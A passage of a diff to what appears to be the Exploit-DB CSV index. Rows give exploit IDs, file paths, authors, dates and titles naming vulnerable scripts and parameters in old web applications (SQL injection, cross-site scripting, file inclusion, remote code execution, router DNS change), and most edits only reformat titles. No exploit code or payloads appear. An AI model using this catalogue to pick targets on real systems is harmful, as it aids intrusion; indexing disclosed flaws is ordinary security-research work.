'login.asp' SQL Injection",2006-11-25,nagazakig74,asp,webapps,0 29181,platforms/php/webapps/29181.txt,"cPanel 11 Beta - Multiple Cross-Site Scripting Vulnerabilities",2006-11-25,"Aria-Security Team",php,webapps,0 -29182,platforms/php/webapps/29182.txt,"cPanel WebHost Manager 3.1 - dochangeemail email Parameter Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 -29183,platforms/php/webapps/29183.txt,"cPanel WebHost Manager 3.1 - addon_configsupport.cgi supporturl Parameter Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 -29184,platforms/php/webapps/29184.txt,"cPanel WebHost Manager 3.1 - editpkg pkg Parameter Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 -29185,platforms/php/webapps/29185.txt,"cPanel WebHost Manager 3.1 - domts2 domain Parameter Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 -29186,platforms/php/webapps/29186.txt,"cPanel WebHost Manager 3.1 - editzone domain Parameter Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 -29187,platforms/php/webapps/29187.txt,"cPanel WebHost Manager 3.1 - dofeaturemanager feature Parameter Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 -29188,platforms/php/webapps/29188.txt,"cPanel WebHost Manager 3.1 - park ndomain Parameter Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 +29182,platforms/php/webapps/29182.txt,"cPanel WebHost Manager 3.1 - 'dochangeemail?email' Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 +29183,platforms/php/webapps/29183.txt,"cPanel WebHost Manager 3.1 - 'addon_configsupport.cgi?supporturl' Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 +29184,platforms/php/webapps/29184.txt,"cPanel WebHost Manager 3.1 - 'editpkg?pkg' Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 +29185,platforms/php/webapps/29185.txt,"cPanel WebHost Manager 3.1 - 'domts2?domain' Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 +29186,platforms/php/webapps/29186.txt,"cPanel WebHost Manager 3.1 - 'editzone?domain' Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 +29187,platforms/php/webapps/29187.txt,"cPanel WebHost Manager 3.1 - 'dofeaturemanager?feature' Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 +29188,platforms/php/webapps/29188.txt,"cPanel WebHost Manager 3.1 - 'park?ndomain' Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 29189,platforms/asp/webapps/29189.txt,"fipsShop - Multiple SQL Injections",2006-11-25,"Aria-Security Team",asp,webapps,0 29191,platforms/asp/webapps/29191.txt,"ClickContact - 'default.asp' Multiple SQL Injections",2006-11-27,"Aria-Security Team",asp,webapps,0 -29192,platforms/asp/webapps/29192.txt,"Clickblog - Displaycalendar.asp SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 +29192,platforms/asp/webapps/29192.txt,"Clickblog - 'Displaycalendar.asp' SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 29193,platforms/asp/webapps/29193.txt,"Click Gallery - Multiple Input Validation Vulnerabilities",2006-11-27,"Aria-Security Team",asp,webapps,0 29195,platforms/asp/webapps/29195.txt,"uPhotoGallery 1.1 - 'Slideshow.asp?ci' SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 29196,platforms/asp/webapps/29196.txt,"uPhotoGallery 1.1 - 'thumbnails.asp?ci' SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 -29197,platforms/asp/webapps/29197.txt,"Evolve Shopping Cart - products.asp SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 +29197,platforms/asp/webapps/29197.txt,"Evolve Shopping Cart - 'products.asp' SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 29198,platforms/php/webapps/29198.txt,"b2evolution 1.8.2/1.9 - '_404_not_found.page.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,"lotto fischer",php,webapps,0 29199,platforms/php/webapps/29199.txt,"b2evolution 1.8.2/1.9 - '_410_stats_gone.page.php?app_name' Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0 40371,platforms/cgi/webapps/40371.sh,"Tenda ADSL2/2+ Modem 963281TAN - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 29200,platforms/php/webapps/29200.txt,"b2evolution 1.8.2/1.9 - '_referer_spam.page.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,"lotto fischer",php,webapps,0 29202,platforms/php/webapps/29202.txt,"Seditio1.10 / Land Down 8.0 Under - 'polls.php' SQL Injection",2006-11-30,ajann,php,webapps,0 29203,platforms/php/webapps/29203.php,"Woltlab Burning Board 2.3.x - 'register.php' Cross-Site Scripting",2006-11-30,blueshisha,php,webapps,0 -29205,platforms/php/webapps/29205.txt,"Invision Gallery 2.0.7 - 'index.php' IMG Parameter SQL Injection",2006-12-01,infection,php,webapps,0 +29205,platforms/php/webapps/29205.txt,"Invision Gallery 2.0.7 - 'index.php?IMG' SQL Injection",2006-12-01,infection,php,webapps,0 29262,platforms/hardware/webapps/29262.pl,"Pirelli Discus DRG A125g - Password Disclosure",2013-10-28,"Sebastián Magof",hardware,webapps,0 -29207,platforms/php/webapps/29207.txt,"DZCP (deV!L_z Clanportal) 1.3.6 - Show Parameter SQL Injection",2006-12-01,"Tim Weber",php,webapps,0 +29207,platforms/php/webapps/29207.txt,"DZCP (deV!L_z Clanportal) 1.3.6 - 'Show' SQL Injection",2006-12-01,"Tim Weber",php,webapps,0 29231,platforms/asp/webapps/29231.txt,"Dol Storye - 'Dettaglio.asp' Multiple SQL Injections",2006-12-06,WarGame,asp,webapps,0 29232,platforms/php/webapps/29232.txt,"Link CMS - 'navigacija.php?IDMeniGlavni' SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0 29233,platforms/php/webapps/29233.txt,"Link CMS - 'prikazInformacije.php?IDStranicaPodaci' SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0 29223,platforms/php/webapps/29223.txt,"Inside Systems Mail 2.0 - 'error.php' Cross-Site Scripting",2006-12-04,"Vicente Aguilera Diaz",php,webapps,0 -29224,platforms/asp/webapps/29224.txt,"UApplication Uguestbook 1.0 - index.asp SQL Injection",2006-12-04,"Aria-Security Team",asp,webapps,0 +29224,platforms/asp/webapps/29224.txt,"UApplication Uguestbook 1.0 - 'index.asp' SQL Injection",2006-12-04,"Aria-Security Team",asp,webapps,0 29225,platforms/php/webapps/29225.txt,"ac4p Mobile - 'up.php?Taaa' Cross-Site Scripting",2006-12-04,SwEET-DeViL,php,webapps,0 29226,platforms/php/webapps/29226.txt,"ac4p Mobile - 'polls.php' Multiple Cross-Site Scripting Vulnerabilities (2)",2006-12-04,SwEET-DeViL,php,webapps,0 29227,platforms/asp/webapps/29227.txt,"Vt-Forum Lite 1.3 - 'vf_info.asp?StrMes' Cross-Site Scripting",2006-12-04,St@rExT,asp,webapps,0 -29228,platforms/asp/webapps/29228.txt,"Vt-Forum Lite 1.3 - vf_newtopic.asp IFRAME Element Cross-Site Scripting",2006-12-04,St@rExT,asp,webapps,0 +29228,platforms/asp/webapps/29228.txt,"Vt-Forum Lite 1.3 - 'vf_newtopic.asp' IFRAME Element Cross-Site Scripting",2006-12-04,St@rExT,asp,webapps,0 29328,platforms/php/webapps/29328.txt,"ImpressPages CMS 3.6 - Arbitrary File Deletion",2013-11-01,LiquidWorm,php,webapps,0 29237,platforms/php/webapps/29237.txt,"cPanel 11 BoxTrapper - Manage.HTML Cross-Site Scripting",2006-12-08,"Aria-Security Team",php,webapps,0 29238,platforms/php/webapps/29238.txt,"cPanel Web Hosting Manager 3.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-12-08,"Aria-Security Team",php,webapps,0 29240,platforms/asp/webapps/29240.txt,"Cilem Haber Free Edition - 'hata.asp?hata' Cross-Site Scripting",2006-12-08,ShaFuck31,asp,webapps,0 -29241,platforms/asp/webapps/29241.txt,"MaviPortal - Arama.asp Cross-Site Scripting",2006-12-09,St@rExT,asp,webapps,0 +29241,platforms/asp/webapps/29241.txt,"MaviPortal - 'Arama.asp' Cross-Site Scripting",2006-12-09,St@rExT,asp,webapps,0 29242,platforms/php/webapps/29242.txt,"Messageriescripthp 2.0 - 'lire-avis.php?aa' SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29243,platforms/php/webapps/29243.txt,"Messageriescripthp 2.0 - 'existepseudo.php?pseudo' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 29244,platforms/php/webapps/29244.txt,"Messageriescripthp 2.0 - 'existeemail.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 @@ -31124,29 +31125,29 @@ id,file,description,date,author,platform,type,port 29251,platforms/php/webapps/29251.txt,"AnnonceScriptHP 2.0 - '/admin/admin_config/Aide.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 29252,platforms/php/webapps/29252.txt,"AnnonceScriptHP 2.0 - 'email.php?id' SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29253,platforms/php/webapps/29253.txt,"AnnonceScriptHP 2.0 - 'voirannonce.php?no' SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29254,platforms/php/webapps/29254.txt,"KDPics 1.11/1.16 - index.php3 categories Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29255,platforms/php/webapps/29255.txt,"KDPics 1.11/1.16 - galeries.inc.php3 categories Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29254,platforms/php/webapps/29254.txt,"KDPics 1.11/1.16 - 'index.php3?categories' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29255,platforms/php/webapps/29255.txt,"KDPics 1.11/1.16 - 'galeries.inc.php3?categories' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 29258,platforms/php/webapps/29258.txt,"PHP RSS Reader 2010 - SQL Injection",2013-10-28,"mishal abdullah",php,webapps,0 29264,platforms/php/webapps/29264.txt,"Onpub CMS 1.4/1.5 - Multiple SQL Injections",2013-10-28,Vulnerability-Lab,php,webapps,0 29265,platforms/php/webapps/29265.txt,"ILIAS eLearning CMS 4.3.4 < 4.4 - Persistent Cross-Site Scripting",2013-10-29,Vulnerability-Lab,php,webapps,0 29266,platforms/hardware/webapps/29266.txt,"Stem Innovation - 'IZON' Hard-Coded Credentials",2013-10-29,"Mark Stanislav",hardware,webapps,0 29267,platforms/php/webapps/29267.txt,"ProNews 1.5 - '/admin/change.php' Multiple Cross-Site Scripting Vulnerabilities",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29268,platforms/php/webapps/29268.txt,"ProNews 1.5 - 'lire-avis.php' aa Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29269,platforms/php/webapps/29269.txt,"ProNews 1.5 - 'lire-avis.php' aa Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29268,platforms/php/webapps/29268.txt,"ProNews 1.5 - 'lire-avis.php?aa' SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29269,platforms/php/webapps/29269.txt,"ProNews 1.5 - 'lire-avis.php?aa' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 29270,platforms/php/webapps/29270.txt,"MXBB Profile Control Panel 0.91c - Module Remote File Inclusion",2006-12-09,bd0rk,php,webapps,0 29271,platforms/asp/webapps/29271.txt,"AppIntellect SpotLight CRM - 'login.asp' SQL Injection",2006-12-09,ajann,asp,webapps,0 29272,platforms/php/webapps/29272.txt,"CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting",2006-12-11,Nicokiller,php,webapps,0 29280,platforms/php/webapps/29280.txt,"GTX CMS 2013 Optima - SQL Injection",2013-10-29,Vulnerability-Lab,php,webapps,0 -29282,platforms/php/webapps/29282.txt,"GenesisTrader 1.0 - form.php Arbitrary File Source Disclosure",2006-12-14,Mr_KaLiMaN,php,webapps,0 +29282,platforms/php/webapps/29282.txt,"GenesisTrader 1.0 - 'form.php' Arbitrary File Source Disclosure",2006-12-14,Mr_KaLiMaN,php,webapps,0 29283,platforms/php/webapps/29283.txt,"GenesisTrader 1.0 - 'form.php' Multiple Cross-Site Scripting Vulnerabilities",2006-12-14,Mr_KaLiMaN,php,webapps,0 29284,platforms/php/webapps/29284.txt,"Moodle 1.5/1.6 - '/mod/forum/discuss.php?navtail' Cross-Site Scripting",2006-12-14,"Jose Miguel Yanez Venegas",php,webapps,0 29288,platforms/asp/webapps/29288.txt,"Omniture SiteCatalyst - Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps,0 29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 - 'Fusion_Forum_View.php' Local File Inclusion",2006-12-16,Kacper,php,webapps,0 -29293,platforms/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 - Haber.asp SQL Injection",2006-12-16,ShaFuck31,asp,webapps,0 -29294,platforms/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 - Shout.php HTML Injection",2006-12-18,IMHOT3B,php,webapps,0 +29293,platforms/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 - 'Haber.asp' SQL Injection",2006-12-16,ShaFuck31,asp,webapps,0 +29294,platforms/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 - 'Shout.php' HTML Injection",2006-12-18,IMHOT3B,php,webapps,0 29298,platforms/php/webapps/29298.txt,"osTicket 1.2/1.3 Support Cards - 'view.php' Cross-Site Scripting",2006-12-19,"Hacker CooL",php,webapps,0 -29299,platforms/php/webapps/29299.txt,"Mini Web Shop 2.1.c - 'view.php Viewcategory.php' Cross-Site Scripting",2006-12-19,Linux_Drox,php,webapps,0 -29300,platforms/php/webapps/29300.txt,"Typo3 3.7/3.8/4.0 - Class.TX_RTEHTMLArea_PI1.php Multiple Remote Command Execution Vulnerabilities",2006-12-20,"D. Fabian",php,webapps,0 +29299,platforms/php/webapps/29299.txt,"Mini Web Shop 2.1.c - 'view.php?Viewcategory.php' Cross-Site Scripting",2006-12-19,Linux_Drox,php,webapps,0 +29300,platforms/php/webapps/29300.txt,"Typo3 3.7/3.8/4.0 - 'Class.TX_RTEHTMLArea_PI1.php' Multiple Remote Command Execution Vulnerabilities",2006-12-20,"D. Fabian",php,webapps,0 29301,platforms/jsp/webapps/29301.txt,"Oracle Portal 9.0.2 - Calendar.jsp Multiple HTTP Response Splitting Vulnerabilities",2006-12-20,"putosoft softputo",jsp,webapps,0 29303,platforms/php/webapps/29303.txt,"PHPBuilder 0.0.2 - 'HTM2PHP.php' Directory Traversal",2006-11-08,"the master",php,webapps,0 29304,platforms/php/webapps/29304.txt,"Calacode @Mail Webmail 4.51 - Filtering Engine HTML Injection",2006-12-20,"Philippe C. Caturegli",php,webapps,0 @@ -31161,17 +31162,17 @@ id,file,description,date,author,platform,type,port 29995,platforms/php/webapps/29995.txt,"Campsite 2.6.1 - 'TimeUnit.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29318,platforms/php/webapps/29318.txt,"ImpressPages CMS 3.6 - Multiple Cross-Site Scripting / SQL Injection Vulnerabilities",2013-10-31,LiquidWorm,php,webapps,0 29326,platforms/php/webapps/29326.txt,"Opsview pre 4.4.1 - Blind SQL Injection",2013-10-31,"J. Oquendo",php,webapps,80 -30207,platforms/asp/webapps/30207.txt,"FuseTalk 4.0 - blog/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter Cross-Site Scripting",2007-06-20,"Ivan Almuina",asp,webapps,0 +30207,platforms/asp/webapps/30207.txt,"FuseTalk 4.0 - 'blog/include/common/comfinish.cfm?FTVAR_SCRIPTRUN' Cross-Site Scripting",2007-06-20,"Ivan Almuina",asp,webapps,0 30203,platforms/asp/webapps/30203.txt,"Comersus Cart 7.0.7 - 'comersus_optReviewReadExec.asp?id' SQL Injection",2007-06-20,Doz,asp,webapps,0 -30204,platforms/asp/webapps/30204.txt,"Comersus Cart 7.0.7 - comersus_customerAuthenticateForm.asp redirectUrl Cross-Site Scripting",2007-06-20,Doz,asp,webapps,0 +30204,platforms/asp/webapps/30204.txt,"Comersus Cart 7.0.7 - 'comersus_customerAuthenticateForm.asp' redirectUrl Cross-Site Scripting",2007-06-20,Doz,asp,webapps,0 29330,platforms/php/webapps/29330.txt,"WordPress Theme Switchblade 1.3 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps,0 29331,platforms/php/webapps/29331.txt,"ImpressPages CMS 3.6 - 'manage()' Remote Code Execution",2013-11-01,LiquidWorm,php,webapps,0 29332,platforms/php/webapps/29332.txt,"WordPress Theme Think Responsive 1.0 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps,0 29333,platforms/asp/webapps/29333.txt,"Efkan Forum 1.0 - 'Grup' SQL Injection",2006-12-22,ShaFuq31,asp,webapps,0 40370,platforms/cgi/webapps/40370.sh,"PLANET VDR-300NU ADSL Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 29334,platforms/cfm/webapps/29334.txt,"Future Internet - 'index.cfm' Multiple SQL Injections",2006-12-23,Linux_Drox,cfm,webapps,0 -29335,platforms/cfm/webapps/29335.txt,"Future Internet - index.cfm categoryId Parameter Cross-Site Scripting",2006-12-23,Linux_Drox,cfm,webapps,0 -29336,platforms/asp/webapps/29336.txt,"Chatwm 1.0 - SelGruFra.asp SQL Injection",2006-12-24,ShaFuq31,asp,webapps,0 +29335,platforms/cfm/webapps/29335.txt,"Future Internet - 'index.cfm?categoryId' Cross-Site Scripting",2006-12-23,Linux_Drox,cfm,webapps,0 +29336,platforms/asp/webapps/29336.txt,"Chatwm 1.0 - 'SelGruFra.asp' SQL Injection",2006-12-24,ShaFuq31,asp,webapps,0 29337,platforms/php/webapps/29337.txt,"TimberWolf 1.2.2 - 'shownews.php' Cross-Site Scripting",2006-12-24,CorryL,php,webapps,0 29338,platforms/php/webapps/29338.txt,"vBulletin 3.5.x/3.6.x - SWF Script Injection",2006-12-25,"Ashraf Morad",php,webapps,0 29342,platforms/php/webapps/29342.txt,"Luckybot 3 - 'DIR' Multiple Remote File Inclusions",2006-12-26,Red_Casper,php,webapps,0 @@ -31190,7 +31191,7 @@ id,file,description,date,author,platform,type,port 29354,platforms/php/webapps/29354.txt,"pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting Web Vulnerabilities",2013-11-01,Vulnerability-Lab,php,webapps,0 29474,platforms/php/webapps/29474.txt,"Scriptme SmE 1.21 - File Mailer Login SQL Injection",2007-01-16,CorryL,php,webapps,0 29356,platforms/php/webapps/29356.txt,"WordPress 1.x/2.0.x - 'template.php' HTML Injection",2006-12-27,"David Kierznowski",php,webapps,0 -29357,platforms/asp/webapps/29357.txt,"Hosting Controller 7C - FolderManager.aspx Directory Traversal",2006-12-27,KAPDA,asp,webapps,0 +29357,platforms/asp/webapps/29357.txt,"Hosting Controller 7C - 'FolderManager.aspx' Directory Traversal",2006-12-27,KAPDA,asp,webapps,0 29358,platforms/asp/webapps/29358.txt,"DMXReady Secure Login Manager 1.0 - 'login.asp?sent' SQL Injection",2006-12-27,Doz,asp,webapps,0 29359,platforms/asp/webapps/29359.txt,"DMXReady Secure Login Manager 1.0 - 'content.asp?sent' SQL Injection",2006-12-27,Doz,asp,webapps,0 29360,platforms/asp/webapps/29360.txt,"DMXReady Secure Login Manager 1.0 - 'members.asp?sent' SQL Injection",2006-12-27,Doz,asp,webapps,0 @@ -31204,27 +31205,27 @@ id,file,description,date,author,platform,type,port 29369,platforms/php/webapps/29369.txt,"PHP iCalendar 1.1/2.x - 'print.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0 29370,platforms/php/webapps/29370.txt,"PHP iCalendar 1.1/2.x - 'preferences.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0 29372,platforms/php/webapps/29372.txt,"Mobilelib Gold - Multiple Cross-Site Scripting Vulnerabilities",2006-12-29,"viP HaCKEr",php,webapps,0 -29373,platforms/asp/webapps/29373.txt,"Spooky 2.7 - login/register.asp SQL Injection",2006-12-30,Doz,asp,webapps,0 +29373,platforms/asp/webapps/29373.txt,"Spooky 2.7 - 'login/register.asp' SQL Injection",2006-12-30,Doz,asp,webapps,0 29377,platforms/php/webapps/29377.txt,"AShop Deluxe 4.5 - 'catalogue.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0 29378,platforms/php/webapps/29378.txt,"AShop Deluxe 4.5 - 'basket.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0 29379,platforms/php/webapps/29379.txt,"AShop Deluxe 4.5 - 'search.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0 29380,platforms/php/webapps/29380.txt,"AShop Deluxe 4.5 - 'shipping.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0 29381,platforms/php/webapps/29381.txt,"AShop Deluxe 4.5 - 'editcatalogue.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0 29382,platforms/php/webapps/29382.txt,"AShop Deluxe 4.5 - 'salesadmin.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0 -29384,platforms/php/webapps/29384.txt,"RI Blog 1.3 - search.asp Cross-Site Scripting",2007-01-05,ShaFuck31,php,webapps,0 -29385,platforms/asp/webapps/29385.txt,"Kolayindir Download - down.asp SQL Injection",2007-01-05,ShaFuck31,asp,webapps,0 +29384,platforms/php/webapps/29384.txt,"RI Blog 1.3 - 'search.asp' Cross-Site Scripting",2007-01-05,ShaFuck31,php,webapps,0 +29385,platforms/asp/webapps/29385.txt,"Kolayindir Download - 'down.asp' SQL Injection",2007-01-05,ShaFuck31,asp,webapps,0 29476,platforms/php/webapps/29476.txt,"Microweber 0.905 - Error-Based SQL Injection",2013-11-07,Zy0d0x,php,webapps,0 29389,platforms/multiple/webapps/29389.txt,"Practico 13.9 - Multiple Vulnerabilities",2013-11-03,LiquidWorm,multiple,webapps,0 29390,platforms/cgi/webapps/29390.txt,"EditTag 1.2 - 'edittag.cgi?file' Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 29391,platforms/cgi/webapps/29391.txt,"EditTag 1.2 - 'edittag.pl?file' Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 29392,platforms/cgi/webapps/29392.txt,"EditTag 1.2 - 'edittag_mp.cgi?file' Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 29393,platforms/cgi/webapps/29393.txt,"EditTag 1.2 - 'edittag_mp.pl?file' Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 -29394,platforms/cgi/webapps/29394.txt,"EditTag 1.2 - mkpw_mp.cgi plain Parameter Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps,0 -29395,platforms/cgi/webapps/29395.txt,"EditTag 1.2 - mkpw.pl plain Parameter Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps,0 -29396,platforms/cgi/webapps/29396.txt,"EditTag 1.2 - mkpw.cgi plain Parameter Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps,0 +29394,platforms/cgi/webapps/29394.txt,"EditTag 1.2 - 'mkpw_mp.cgi?plain' Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps,0 +29395,platforms/cgi/webapps/29395.txt,"EditTag 1.2 - 'mkpw.pl?plain' Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps,0 +29396,platforms/cgi/webapps/29396.txt,"EditTag 1.2 - 'mkpw.cgi?plain' Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps,0 29397,platforms/php/webapps/29397.php,"Coppermine Photo Gallery 1.4.11 - SQL Injection",2007-01-05,DarkFig,php,webapps,0 -29398,platforms/asp/webapps/29398.txt,"Shopstorenow E-Commerce Shopping Cart - Orange.asp SQL Injection",2007-01-06,IbnuSina,asp,webapps,0 -29401,platforms/asp/webapps/29401.txt,"CreateAuction - Cats.asp SQL Injection",2007-01-08,IbnuSina,asp,webapps,0 +29398,platforms/asp/webapps/29398.txt,"Shopstorenow E-Commerce Shopping Cart - 'Orange.asp' SQL Injection",2007-01-06,IbnuSina,asp,webapps,0 +29401,platforms/asp/webapps/29401.txt,"CreateAuction - 'Cats.asp' SQL Injection",2007-01-08,IbnuSina,asp,webapps,0 29404,platforms/php/webapps/29404.txt,"MediaWiki 1.x - 'AJAX index.php' Cross-Site Scripting",2007-01-09,"Moshe Ben-Abu",php,webapps,0 29405,platforms/php/webapps/29405.txt,"PHPKit 1.6.1 - 'comment.php' SQL Injection",2007-01-09,yorn,php,webapps,0 29407,platforms/php/webapps/29407.txt,"Magic Photo Storage Website - '/admin/admin_password.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 @@ -31259,7 +31260,7 @@ id,file,description,date,author,platform,type,port 29435,platforms/multiple/webapps/29435.txt,"Apache Tomcat 5.5.25 - Cross-Site Request Forgery",2013-11-04,"Ivano Binetti",multiple,webapps,0 29437,platforms/php/webapps/29437.txt,"Easy Banner Pro 2.8 - 'info.php' Remote File Inclusion",2007-01-07,rUnViRuS,php,webapps,0 29438,platforms/php/webapps/29438.txt,"Edit-X - 'Edit_Address.php' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29442,platforms/php/webapps/29442.html,"phpBB 2.0.21 - privmsg.php HTML Injection",2007-01-11,Demential,php,webapps,0 +29442,platforms/php/webapps/29442.html,"phpBB 2.0.21 - 'privmsg.php' HTML Injection",2007-01-11,Demential,php,webapps,0 36794,platforms/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,multiple,webapps,0 29450,platforms/php/webapps/29450.txt,"Ezboxx 0.7.6 Beta - Multiple Input Validation Vulnerabilities",2007-01-12,"Doron P",php,webapps,0 29451,platforms/php/webapps/29451.txt,"All In One Control Panel 1.3.x - 'cp_downloads.php?did' SQL Injection",2007-01-12,Coloss,php,webapps,0 @@ -31271,7 +31272,7 @@ id,file,description,date,author,platform,type,port 29479,platforms/php/webapps/29479.txt,"Indexu 5.0/5.3 - 'user_detail.php?u' Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29480,platforms/php/webapps/29480.txt,"Indexu 5.0/5.3 - 'tell_friend.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,php,webapps,0 29481,platforms/php/webapps/29481.txt,"Indexu 5.0/5.3 - 'Sendmail.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,php,webapps,0 -29464,platforms/php/webapps/29464.txt,"Liens_Dynamiques 2.1 - AdminLien.php Security Restriction Bypass",2007-01-15,sn0oPy,php,webapps,0 +29464,platforms/php/webapps/29464.txt,"Liens_Dynamiques 2.1 - 'AdminLien.php' Security Restriction Bypass",2007-01-15,sn0oPy,php,webapps,0 29466,platforms/php/webapps/29466.txt,"Liens_Dynamiques 2.1 - Multiple Unspecified Cross-Site Scripting Vulnerabilities",2007-01-15,sn0oPy,php,webapps,0 29468,platforms/php/webapps/29468.txt,"Jax Petition Book 3.06 - 'jax_petitionbook.php?languagepack' Local File Inclusion",2007-01-15,"ilker Kandemir",php,webapps,0 29469,platforms/php/webapps/29469.txt,"Jax Petition 3.06 Book - 'smileys.php?languagepack' Local File Inclusion",2007-01-15,"ilker Kandemir",php,webapps,0 @@ -31283,7 +31284,7 @@ id,file,description,date,author,platform,type,port 29486,platforms/php/webapps/29486.txt,"Indexu 5.0/5.3 - 'power_search.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,php,webapps,0 29487,platforms/php/webapps/29487.txt,"Indexu 5.0/5.3 - 'new.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,php,webapps,0 29488,platforms/php/webapps/29488.txt,"Indexu 5.0/5.3 - 'mailing_list.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,php,webapps,0 -29489,platforms/php/webapps/29489.txt,"Indexu 5.0/5.3 - 'login.php' Error_msg Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 +29489,platforms/php/webapps/29489.txt,"Indexu 5.0/5.3 - 'login.php?Error_msg' Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0 40368,platforms/cgi/webapps/40368.sh,"Inteno EG101R1 VoIP Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 29492,platforms/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0 @@ -31301,11 +31302,11 @@ id,file,description,date,author,platform,type,port 30085,platforms/linux/webapps/30085.txt,"Zimbra 2009-2013 - Local File Inclusion",2013-12-06,rubina119,linux,webapps,0 30035,platforms/php/webapps/30035.txt,"SonicBB 1.0 - Multiple SQL Injections",2007-05-14,"Jesper Jurcenoks",php,webapps,0 30036,platforms/php/webapps/30036.html,"WordPress Plugin Akismet 2.1.3 - Unspecified",2007-05-14,"David Kierznowski",php,webapps,0 -30040,platforms/php/webapps/30040.txt,"Jetbox CMS 2.1 - Email FormMail.php Input Validation",2007-05-15,"Jesper Jurcenoks",php,webapps,0 